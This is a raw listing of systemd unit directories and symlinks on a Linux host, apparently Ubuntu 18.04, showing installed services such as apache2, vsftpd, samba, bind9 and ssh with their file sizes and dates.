lrwxrwxrwx 1 root root 33 Oct  5  2018 rsync.service -> /lib/systemd/system/rsync.service
lrwxrwxrwx 1 root root 41 Oct  5  2018 console-setup.service -> /lib/systemd/system/console-setup.service
lrwxrwxrwx 1 root root 47 Oct  5  2018 networkd-dispatcher.service -> /lib/systemd/system/networkd-dispatcher.service
lrwxrwxrwx 1 root root 35 Oct  5  2018 rsyslog.service -> /lib/systemd/system/rsyslog.service
lrwxrwxrwx 1 root root 32 Oct  5  2018 cron.service -> /lib/systemd/system/cron.service
lrwxrwxrwx 1 root root 36 Oct  5  2018 ondemand.service -> /lib/systemd/system/ondemand.service
lrwxrwxrwx 1 root root 44 Oct  5  2018 systemd-resolved.service -> /lib/systemd/system/systemd-resolved.service
lrwxrwxrwx 1 root root 36 Oct  5  2018 remote-fs.target -> /lib/systemd/system/remote-fs.target

/etc/systemd/system/network-online.target.wants:
total 0
lrwxrwxrwx 1 root root 38 Jan 23  2019 networking.service -> /lib/systemd/system/networking.service

/etc/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 41 Oct  6  2018 phpsessionclean.timer -> /lib/systemd/system/phpsessionclean.timer
lrwxrwxrwx 1 root root 35 Oct  5  2018 apt-daily.timer -> /lib/systemd/system/apt-daily.timer
lrwxrwxrwx 1 root root 43 Oct  5  2018 apt-daily-upgrade.timer -> /lib/systemd/system/apt-daily-upgrade.timer
lrwxrwxrwx 1 root root 32 Oct  5  2018 fstrim.timer -> /lib/systemd/system/fstrim.timer
lrwxrwxrwx 1 root root 35 Oct  5  2018 motd-news.timer -> /lib/systemd/system/motd-news.timer

/etc/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 43 Oct  5  2018 accounts-daemon.service -> /lib/systemd/system/accounts-daemon.service

/etc/systemd/system/default.target.wants:
total 0
lrwxrwxrwx 1 root root 38 Oct  5  2018 ureadahead.service -> /lib/systemd/system/ureadahead.service

/etc/systemd/system/emergency.target.wants:
total 0
lrwxrwxrwx 1 root root 45 Oct  5  2018 friendly-recovery.service -> /lib/systemd/system/friendly-recovery.service

/etc/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 45 Oct  5  2018 friendly-recovery.service -> /lib/systemd/system/friendly-recovery.service

/etc/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 45 Oct  5  2018 friendly-recovery.service -> /lib/systemd/system/friendly-recovery.service
lrwxrwxrwx 1 root root 36 Oct  5  2018 apparmor.service -> /lib/systemd/system/apparmor.service
lrwxrwxrwx 1 root root 36 Oct  5  2018 setvtrgb.service -> /lib/systemd/system/setvtrgb.service
lrwxrwxrwx 1 root root 42 Oct  5  2018 keyboard-setup.service -> /lib/systemd/system/keyboard-setup.service
lrwxrwxrwx 1 root root 45 Oct  5  2018 systemd-timesyncd.service -> /lib/systemd/system/systemd-timesyncd.service

/etc/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 32 Oct  5  2018 uuidd.socket -> /lib/systemd/system/uuidd.socket

/etc/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 34 Oct  5  2018 getty@tty1.service -> /lib/systemd/system/getty@.service

/etc/systemd/network:
total 0

/etc/systemd/user:
total 0

/lib/systemd/:
total 7.3M
drwxr-xr-x 23 root root  36K Jan 23  2019 system
drwxr-xr-x  2 root root 4.0K Oct  5  2018 system-sleep
drwxr-xr-x  2 root root 4.0K Oct  5  2018 network
drwxr-xr-x  2 root root 4.0K Oct  5  2018 system-generators
drwxr-xr-x  2 root root 4.0K Oct  5  2018 system-preset
-rw-r--r--  1 root root 2.3M Jul 20  2018 libsystemd-shared-237.so
-rwxr-xr-x  1 root root 1.3K Jul 20  2018 set-cpufreq
-rwxr-xr-x  1 root root 1.6M Jul 20  2018 systemd
-rwxr-xr-x  1 root root 6.0K Jul 20  2018 systemd-ac-power
-rwxr-xr-x  1 root root  18K Jul 20  2018 systemd-backlight
-rwxr-xr-x  1 root root  11K Jul 20  2018 systemd-binfmt
-rwxr-xr-x  1 root root  10K Jul 20  2018 systemd-cgroups-agent
-rwxr-xr-x  1 root root  22K Jul 20  2018 systemd-cryptsetup
-rwxr-xr-x  1 root root  15K Jul 20  2018 systemd-dissect
-rwxr-xr-x  1 root root  18K Jul 20  2018 systemd-fsck
-rwxr-xr-x  1 root root  23K Jul 20  2018 systemd-fsckd
-rwxr-xr-x  1 root root  19K Jul 20  2018 systemd-growfs
-rwxr-xr-x  1 root root  10K Jul 20  2018 systemd-hibernate-resume
-rwxr-xr-x  1 root root  23K Jul 20  2018 systemd-hostnamed
-rwxr-xr-x  1 root root  15K Jul 20  2018 systemd-initctl
-rwxr-xr-x  1 root root 127K Jul 20  2018 systemd-journald
-rwxr-xr-x  1 root root  35K Jul 20  2018 systemd-localed
-rwxr-xr-x  1 root root 215K Jul 20  2018 systemd-logind
-rwxr-xr-x  1 root root  10K Jul 20  2018 systemd-makefs
-rwxr-xr-x  1 root root  15K Jul 20  2018 systemd-modules-load
-rwxr-xr-x  1 root root 1.6M Jul 20  2018 systemd-networkd
-rwxr-xr-x  1 root root  19K Jul 20  2018 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  11K Jul 20  2018 systemd-quotacheck
-rwxr-xr-x  1 root root  10K Jul 20  2018 systemd-random-seed
-rwxr-xr-x  1 root root  15K Jul 20  2018 systemd-remount-fs
-rwxr-xr-x  1 root root  10K Jul 20  2018 systemd-reply-password
-rwxr-xr-x  1 root root 371K Jul 20  2018 systemd-resolved
-rwxr-xr-x  1 root root  19K Jul 20  2018 systemd-rfkill
-rwxr-xr-x  1 root root  43K Jul 20  2018 systemd-shutdown
-rwxr-xr-x  1 root root  19K Jul 20  2018 systemd-sleep
-rwxr-xr-x  1 root root  23K Jul 20  2018 systemd-socket-proxyd
-rwxr-xr-x  1 root root  11K Jul 20  2018 systemd-sulogin-shell
-rwxr-xr-x  1 root root  15K Jul 20  2018 systemd-sysctl
-rwxr-xr-x  1 root root  27K Jul 20  2018 systemd-timedated
-rwxr-xr-x  1 root root  39K Jul 20  2018 systemd-timesyncd
-rwxr-xr-x  1 root root 571K Jul 20  2018 systemd-udevd
-rwxr-xr-x  1 root root  15K Jul 20  2018 systemd-update-utmp
-rwxr-xr-x  1 root root  10K Jul 20  2018 systemd-user-sessions
-rwxr-xr-x  1 root root  10K Jul 20  2018 systemd-veritysetup
-rwxr-xr-x  1 root root  10K Jul 20  2018 systemd-volatile-root
-rwxr-xr-x  1 root root 1.3K Jun 22  2018 systemd-sysv-install
drwxr-xr-x  2 root root 4.0K Apr 20  2018 system-shutdown
-rw-r--r--  1 root root  685 Jan 28  2018 resolv.conf

/lib/systemd/system:
total 864K
drwxr-xr-x 2 root root 4.0K Oct  5  2018 apache2.service.d
drwxr-xr-x 2 root root 4.0K Oct  5  2018 halt.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 getty.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 timers.target.wants
drwxr-xr-x 2 root root 4.0K Oct  5  2018 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Oct  5  2018 user@.service.d
-rw-r--r-- 1 root root  412 Sep 12  2018 plymouth-halt.service
-rw-r--r-- 1 root root  426 Sep 12  2018 plymouth-kexec.service
lrwxrwxrwx 1 root root   27 Sep 12  2018 plymouth-log.service -> plymouth-read-write.service
-rw-r--r-- 1 root root  421 Sep 12  2018 plymouth-poweroff.service
-rw-r--r-- 1 root root  200 Sep 12  2018 plymouth-quit-wait.service
-rw-r--r-- 1 root root  194 Sep 12  2018 plymouth-quit.service
-rw-r--r-- 1 root root  244 Sep 12  2018 plymouth-read-write.service
-rw-r--r-- 1 root root  416 Sep 12  2018 plymouth-reboot.service
-rw-r--r-- 1 root root  532 Sep 12  2018 plymouth-start.service
-rw-r--r-- 1 root root  291 Sep 12  2018 plymouth-switch-root.service
lrwxrwxrwx 1 root root   21 Sep 12  2018 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root  490 Sep 12  2018 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  467 Sep 12  2018 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root  306 Sep 11  2018 open-vm-tools.service
-rw-r--r-- 1 root root  298 Sep 10  2018 vgauth.service
-rw-r--r-- 1 root root  173 Aug  7  2018 motd-news.service
-rw-r--r-- 1 root root  175 Aug  7  2018 motd-news.timer
-rw-r--r-- 1 root root  417 Aug  6  2018 nmbd.service
-rw-r--r-- 1 root root  384 Aug  6  2018 samba-ad-dc.service
-rw-r--r-- 1 root root  429 Aug  6  2018 smbd.service
lrwxrwxrwx 1 root root   14 Jul 20  2018 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 checkroot.service -> /dev/null
-rw-r--r-- 1 root root 1.1K Jul 20  2018 console-getty.service
-rw-r--r-- 1 root root 1.3K Jul 20  2018 container-getty@.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Jul 20  2018 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Jul 20  2018 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Jul 20  2018 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Jul 20  2018 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   25 Jul 20  2018 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jul 20  2018 debug-shell.service
lrwxrwxrwx 1 root root   16 Jul 20  2018 default.target -> graphical.target
-rw-r--r-- 1 root root  797 Jul 20  2018 emergency.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 fuse.service -> /dev/null
-rw-r--r-- 1 root root 2.0K Jul 20  2018 getty@.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 hwclock.service -> /dev/null
-rw-r--r-- 1 root root  670 Jul 20  2018 initrd-cleanup.service
-rw-r--r-- 1 root root  830 Jul 20  2018 initrd-parse-etc.service
-rw-r--r-- 1 root root  589 Jul 20  2018 initrd-switch-root.service
-rw-r--r-- 1 root root  704 Jul 20  2018 initrd-udevadm-cleanup-db.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 killprocs.service -> /dev/null
-rw-r--r-- 1 root root  717 Jul 20  2018 kmod-static-nodes.service
lrwxrwxrwx 1 root root   28 Jul 20  2018 kmod.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root   28 Jul 20  2018 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root   22 Jul 20  2018 procps.service -> systemd-sysctl.service
-rw-r--r-- 1 root root  609 Jul 20  2018 quotaon.service
-rw-r--r-- 1 root root  716 Jul 20  2018 rc-local.service
lrwxrwxrwx 1 root root   16 Jul 20  2018 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 reboot.service -> /dev/null
-rw-r--r-- 1 root root  788 Jul 20  2018 rescue.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 Jul 20  2018 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Jul 20  2018 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Jul 20  2018 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Jul 20  2018 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Jul 20  2018 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Jul 20  2018 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Jul 20  2018 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Jul 20  2018 sendsigs.service -> /dev/null
-rw-r--r-- 1 root root 1.5K Jul 20  2018 serial-getty@.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 stop-bootlogd.service -> /dev/null
-rw-r--r-- 1 root root  554 Jul 20  2018 suspend-then-hibernate.target
-rw-r--r-- 1 root root 1.4K Jul 20  2018 system-update-cleanup.service
-rw-r--r-- 1 root root  724 Jul 20  2018 systemd-ask-password-console.service
-rw-r--r-- 1 root root  752 Jul 20  2018 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  752 Jul 20  2018 systemd-backlight@.service
-rw-r--r-- 1 root root  999 Jul 20  2018 systemd-binfmt.service
-rw-r--r-- 1 root root  537 Jul 20  2018 systemd-exit.service
-rw-r--r-- 1 root root  714 Jul 20  2018 systemd-fsck-root.service
-rw-r--r-- 1 root root  715 Jul 20  2018 systemd-fsck@.service
-rw-r--r-- 1 root root  551 Jul 20  2018 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Jul 20  2018 systemd-fsckd.socket
-rw-r--r-- 1 root root  584 Jul 20  2018 systemd-halt.service
-rw-r--r-- 1 root root  671 Jul 20  2018 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  541 Jul 20  2018 systemd-hibernate.service
-rw-r--r-- 1 root root 1.1K Jul 20  2018 systemd-hostnamed.service
-rw-r--r-- 1 root root  818 Jul 20  2018 systemd-hwdb-update.service
-rw-r--r-- 1 root root  559 Jul 20  2018 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  551 Jul 20  2018 systemd-initctl.service
-rw-r--r-- 1 root root  771 Jul 20  2018 systemd-journal-flush.service
-rw-r--r-- 1 root root  686 Jul 20  2018 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.6K Jul 20  2018 systemd-journald.service
-rw-r--r-- 1 root root  597 Jul 20  2018 systemd-kexec.service
-rw-r--r-- 1 root root 1.1K Jul 20  2018 systemd-localed.service
-rw-r--r-- 1 root root 1.5K Jul 20  2018 systemd-logind.service
-rw-r--r-- 1 root root  733 Jul 20  2018 systemd-machine-id-commit.service
-rw-r--r-- 1 root root 1007 Jul 20  2018 systemd-modules-load.service
-rw-r--r-- 1 root root  740 Jul 20  2018 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 1.9K Jul 20  2018 systemd-networkd.service
-rw-r--r-- 1 root root  593 Jul 20  2018 systemd-poweroff.service
-rw-r--r-- 1 root root  655 Jul 20  2018 systemd-quotacheck.service
-rw-r--r-- 1 root root  792 Jul 20  2018 systemd-random-seed.service
-rw-r--r-- 1 root root  588 Jul 20  2018 systemd-reboot.service
-rw-r--r-- 1 root root  833 Jul 20  2018 systemd-remount-fs.service
-rw-r--r-- 1 root root 1.7K Jul 20  2018 systemd-resolved.service
-rw-r--r-- 1 root root  724 Jul 20  2018 systemd-rfkill.service
-rw-r--r-- 1 root root  573 Jul 20  2018 systemd-suspend-then-hibernate.service
-rw-r--r-- 1 root root  537 Jul 20  2018 systemd-suspend.service
-rw-r--r-- 1 root root  693 Jul 20  2018 systemd-sysctl.service
-rw-r--r-- 1 root root 1.1K Jul 20  2018 systemd-timedated.service
-rw-r--r-- 1 root root 1.4K Jul 20  2018 systemd-timesyncd.service
-rw-r--r-- 1 root root  659 Jul 20  2018 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  764 Jul 20  2018 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  744 Jul 20  2018 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  863 Jul 20  2018 systemd-udev-settle.service
-rw-r--r-- 1 root root  755 Jul 20  2018 systemd-udev-trigger.service
-rw-r--r-- 1 root root  985 Jul 20  2018 systemd-udevd.service
-rw-r--r-- 1 root root  797 Jul 20  2018 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  794 Jul 20  2018 systemd-update-utmp.service
-rw-r--r-- 1 root root  628 Jul 20  2018 systemd-user-sessions.service
-rw-r--r-- 1 root root  690 Jul 20  2018 systemd-volatile-root.service
lrwxrwxrwx 1 root root   21 Jul 20  2018 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jul 20  2018 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Jul 20  2018 urandom.service -> systemd-random-seed.service
-rw-r--r-- 1 root root  593 Jul 20  2018 user@.service
lrwxrwxrwx 1 root root    9 Jul 20  2018 x11-common.service -> /dev/null
-rw-r--r-- 1 root root  238 Jul  9  2018 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 Jul  9  2018 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  326 Jul  9  2018 apt-daily.service
-rw-r--r-- 1 root root  156 Jul  9  2018 apt-daily.timer
-rw-r--r-- 1 root root  266 Jul  5  2018 netplan-wpa@.service
-rw-r--r-- 1 root root  528 Jun 27  2018 apache-htcacheclean.service
-rw-r--r-- 1 root root  537 Jun 27  2018 apache-htcacheclean@.service
-rw-r--r-- 1 root root  346 Jun 27  2018 apache2.service
-rw-r--r-- 1 root root  418 Jun 27  2018 apache2@.service
-rw-r--r-- 1 root root  342 Jun 22  2018 getty-static.service
-rw-r--r-- 1 root root  362 Jun 22  2018 ondemand.service
-rw-r--r-- 1 root root  258 Jun 19  2018 networkd-dispatcher.service
-rw-r--r-- 1 root root   92 May 16  2018 fstrim.service
-rw-r--r-- 1 root root  170 May 16  2018 fstrim.timer
-rw-r--r-- 1 root root  189 May 16  2018 uuidd.service
-rw-r--r-- 1 root root  126 May 16  2018 uuidd.socket
-rw-r--r-- 1 root root  290 Apr 24  2018 rsyslog.service
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20  2018 runlevel5.target.wants
-rw-r--r-- 1 root root  808 Mar 29  2018 friendly-recovery.service
-rw-r--r-- 1 root root  350 Mar 23  2018 bind9-pkcs11.service
-rw-r--r-- 1 root root  324 Mar 23  2018 bind9.service
-rw-r--r-- 1 root root  370 Mar 23  2018 bind9-resolvconf.service
-rw-r--r-- 1 root root  544 Mar 22  2018 apparmor.service
-rw-r--r-- 1 root root  287 Feb 16  2018 keyboard-setup.service
-rw-r--r-- 1 root root  312 Feb 16  2018 console-setup.service
-rw-r--r-- 1 root root  919 Jan 28  2018 basic.target
-rw-r--r-- 1 root root  419 Jan 28  2018 bluetooth.target
-rw-r--r-- 1 root root  465 Jan 28  2018 cryptsetup-pre.target
-rw-r--r-- 1 root root  412 Jan 28  2018 cryptsetup.target
-rw-r--r-- 1 root root  750 Jan 28  2018 dev-hugepages.mount
-rw-r--r-- 1 root root  665 Jan 28  2018 dev-mqueue.mount
-rw-r--r-- 1 root root  471 Jan 28  2018 emergency.target
-rw-r--r-- 1 root root  541 Jan 28  2018 exit.target
-rw-r--r-- 1 root root  480 Jan 28  2018 final.target
-rw-r--r-- 1 root root  506 Jan 28  2018 getty-pre.target
-rw-r--r-- 1 root root  500 Jan 28  2018 getty.target
-rw-r--r-- 1 root root  598 Jan 28  2018 graphical.target
-rw-r--r-- 1 root root  527 Jan 28  2018 halt.target
-rw-r--r-- 1 root root  509 Jan 28  2018 hibernate.target
-rw-r--r-- 1 root root  530 Jan 28  2018 hybrid-sleep.target
-rw-r--r-- 1 root root  593 Jan 28  2018 initrd-fs.target
-rw-r--r-- 1 root root  561 Jan 28  2018 initrd-root-device.target
-rw-r--r-- 1 root root  566 Jan 28  2018 initrd-root-fs.target
-rw-r--r-- 1 root root  754 Jan 28  2018 initrd-switch-root.target
-rw-r--r-- 1 root root  763 Jan 28  2018 initrd.target
-rw-r--r-- 1 root root  541 Jan 28  2018 kexec.target
-rw-r--r-- 1 root root  435 Jan 28  2018 local-fs-pre.target
-rw-r--r-- 1 root root  547 Jan 28  2018 local-fs.target
-rw-r--r-- 1 root root  445 Jan 28  2018 machine.slice
-rw-r--r-- 1 root root  532 Jan 28  2018 multi-user.target
-rw-r--r-- 1 root root  505 Jan 28  2018 network-online.target
-rw-r--r-- 1 root root  502 Jan 28  2018 network-pre.target
-rw-r--r-- 1 root root  521 Jan 28  2018 network.target
-rw-r--r-- 1 root root  554 Jan 28  2018 nss-lookup.target
-rw-r--r-- 1 root root  513 Jan 28  2018 nss-user-lookup.target
-rw-r--r-- 1 root root  394 Jan 28  2018 paths.target
-rw-r--r-- 1 root root  592 Jan 28  2018 poweroff.target
-rw-r--r-- 1 root root  417 Jan 28  2018 printer.target
-rw-r--r-- 1 root root  745 Jan 28  2018 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  655 Jan 28  2018 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  583 Jan 28  2018 reboot.target
-rw-r--r-- 1 root root  549 Jan 28  2018 remote-cryptsetup.target
-rw-r--r-- 1 root root  436 Jan 28  2018 remote-fs-pre.target
-rw-r--r-- 1 root root  522 Jan 28  2018 remote-fs.target
-rw-r--r-- 1 root root  492 Jan 28  2018 rescue.target
-rw-r--r-- 1 root root  540 Jan 28  2018 rpcbind.target
-rw-r--r-- 1 root root  442 Jan 28  2018 shutdown.target
-rw-r--r-- 1 root root  402 Jan 28  2018 sigpwr.target
-rw-r--r-- 1 root root  460 Jan 28  2018 sleep.target
-rw-r--r-- 1 root root  449 Jan 28  2018 slices.target
-rw-r--r-- 1 root root  420 Jan 28  2018 smartcard.target
-rw-r--r-- 1 root root  396 Jan 28  2018 sockets.target
-rw-r--r-- 1 root root  420 Jan 28  2018 sound.target
-rw-r--r-- 1 root root  503 Jan 28  2018 suspend.target
-rw-r--r-- 1 root root  393 Jan 28  2018 swap.target
-rw-r--r-- 1 root root  795 Jan 28  2018 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  767 Jan 28  2018 sys-kernel-config.mount
-rw-r--r-- 1 root root  710 Jan 28  2018 sys-kernel-debug.mount
-rw-r--r-- 1 root root  558 Jan 28  2018 sysinit.target
-rw-r--r-- 1 root root 1.4K Jan 28  2018 syslog.socket
-rw-r--r-- 1 root root  592 Jan 28  2018 system-update.target
-rw-r--r-- 1 root root  445 Jan 28  2018 system.slice
-rw-r--r-- 1 root root  704 Jan 28  2018 systemd-ask-password-console.path
-rw-r--r-- 1 root root  632 Jan 28  2018 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  564 Jan 28  2018 systemd-initctl.socket
-rw-r--r-- 1 root root 1.2K Jan 28  2018 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root  882 Jan 28  2018 systemd-journald.socket
-rw-r--r-- 1 root root  631 Jan 28  2018 systemd-networkd.socket
-rw-r--r-- 1 root root  657 Jan 28  2018 systemd-rfkill.socket
-rw-r--r-- 1 root root  490 Jan 28  2018 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  635 Jan 28  2018 systemd-udevd-control.socket
-rw-r--r-- 1 root root  610 Jan 28  2018 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  435 Jan 28  2018 time-sync.target
-rw-r--r-- 1 root root  445 Jan 28  2018 timers.target
-rw-r--r-- 1 root root  457 Jan 28  2018 umount.target
-rw-r--r-- 1 root root  432 Jan 28  2018 user.slice
-rw-r--r-- 1 root root  493 Jan 26  2018 ssh.service
-rw-r--r-- 1 root root  244 Jan 26  2018 ssh@.service
lrwxrwxrwx 1 root root    9 Jan 18  2018 sudo.service -> /dev/null
-rw-r--r-- 1 root root  155 Jan 18  2018 phpsessionclean.service
-rw-r--r-- 1 root root  144 Jan 18  2018 phpsessionclean.timer
-rw-r--r-- 1 root root  216 Jan 16  2018 ssh.socket
-rw-r--r-- 1 root root  741 Dec 18  2017 accounts-daemon.service
-rw-r--r-- 1 root root  368 Dec 11  2017 irqbalance.service
-rw-r--r-- 1 root root  251 Nov 16  2017 cron.service
-rw-r--r-- 1 root root  505 Nov 16  2017 dbus.service
-rw-r--r-- 1 root root  106 Nov 16  2017 dbus.socket
-rw-r--r-- 1 root root  266 Aug 15  2017 ufw.service
-rw-r--r-- 1 root root  250 Aug 15  2017 ureadahead-stop.service
-rw-r--r-- 1 root root  242 Aug 15  2017 ureadahead-stop.timer
-rw-r--r-- 1 root root  401 Aug 15  2017 ureadahead.service
-rw-r--r-- 1 root root  330 Aug 10  2017 setvtrgb.service
-rw-r--r-- 1 root root  248 Jul 27  2014 vsftpd.service
-rw-r--r-- 1 root root  188 Feb 24  2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Jun 27  2018 apache2-systemd.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Sep 12  2018 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Sep 12  2018 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Sep 12  2018 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Sep 12  2018 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Sep 12  2018 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 Sep 12  2018 plymouth-quit.service -> ../plymouth-quit.service
lrwxrwxrwx 1 root root 15 Jul 20  2018 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Jul 20  2018 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jul 20  2018 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jul 20  2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jul 20  2018 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Nov 16  2017 dbus.service -> ../dbus.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 28 Sep 12  2018 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 26 Sep 12  2018 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 30 Sep 12  2018 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Sep 12  2018 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 20 Jul 20  2018 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jul 20  2018 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jul 20  2018 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Jul 20  2018 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Jul 20  2018 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Jul 20  2018 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
